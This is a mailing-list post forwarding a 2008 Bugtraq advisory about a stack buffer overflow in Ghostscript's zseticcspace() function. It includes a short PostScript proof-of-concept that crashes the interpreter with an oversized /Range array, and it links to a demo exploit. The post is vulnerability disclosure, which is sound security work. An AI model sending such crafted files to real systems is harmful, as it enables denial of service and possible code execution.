[gs-devel] [Fwd: Ghostscript buffer overflow]
Lee Howard
faxguy at howardsilvan.com
Fri Feb 29 09:33:37 PST 2008
-------- Original Message --------
Subject: Ghostscript buffer overflow
Date: Thu, 28 Feb 2008 14:57:42 -0800
From: Chris Evans <scarybeasts at gmail.com>
To: bugtraq at securityfocus.com
Hi,
Buffer overflow in Ghostscript. A useful attack vector because a lot
of UNIX workstations will put PS files on the web through Ghostscript.
The problem is a stack-based buffer overflow in the zseticcspace()
function in zicc.c. The issue is over-trust of the length of a
postscript array which an attacker can set to an arbitrary length. One
slight amusement is that the overflowed type is "float", leading to
machine code -> float conversion in any exploit. An example .ps file
to trigger a crash follows:
%!PS-Adobe-2.0
<< /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace
Announcement:
http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html
Full technical details including a demo exploit by my colleague Will Drewry:
http://scary.beasts.org/security/CESA-2008-001.html
Cheers
Chris
More information about the gs-devel
mailing list